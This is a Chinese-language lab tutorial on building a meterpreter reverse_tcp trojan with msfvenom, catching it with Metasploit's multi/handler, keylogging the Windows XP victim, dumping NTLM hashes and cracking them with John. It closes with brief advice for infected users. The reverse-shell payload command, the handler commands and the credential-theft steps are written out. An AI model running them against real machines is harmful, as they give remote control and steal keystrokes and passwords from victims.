用Msfvenom生成木马并控制中木马的主机，实施用户密码破解

本文来源:yggcwhat

一、环境配置(两台主机均采用NAT桥接模式) 

1、Kali主机的IP配置：

2、winxp主机的IP配置：

二、远程控制计算机 

1、利用msfvenom工具生成一个木马控制端—shell.exe，并把该木马程序保存到root用户下

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.22 lport=1211 -f exe > /root/shell.exe

2、将shell.exe文件拷贝到WINXP的桌面上

3、启用MSF攻击平台

4、加载模块和选择Payload

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

5、设置Payload参数 Lhost为kali的IP，Lport 为kali监听的端口

msf5 exploit(multi/handler) > set lhost 192.168.1.22

msf5 exploit(multi/handler) > set lport 1211

6、双击执行WINXP主机上的shell.exe文件

7、在kali上实施渗透攻击

8、在kali上实施键盘记录

1）输入如下命令启用键盘记录功能

（2）在windows xp2的CMD.exe环境下输入命令

（3）在kali上打开键盘记录文件，可以看到文件中记录下来在windows xp2中输入的内容。

9、用john（密码破解工具）破解windows xp2在任务1创建的用户（即自己姓名的拼音小写首字母）密码，实验中用户名为：zs ,密码为：police

（1）将用于破解的密码词典password.lst文件拷贝到root用户目录下

（2）在kali上用命令hashdump获取windows xp2的用户名及加密后的密码（NTLM hash值）

（3）将zs用户的密码NTLM hash值保存在zs.hash文件中，并查看

（4）启用john的图形化界面

（5）打开zs.hash文件进行破解

（6）选择要破解的密码加密算法和密码词典（password.lst）

（7）开始破解密码

（8）密码破解成功

现在木马已经是非常常见的了，在我们的日常生活中计算机中了木马要怎么办？

发现电脑中了木马之后，第一件事儿要断网，因为木马不会对电脑有什么危害，但是它会把你电脑的一些信息游戏帐号等发给黑客，断网后，如果电脑没有杀毒软件，重启后就不停按F8，选择进入网络安全模式，在安全模式下木马没办法自动运行去盗号，然后在网络安全模式下，下载电脑的杀毒软件进行杀毒。

标签： 数据安全 网络安全技术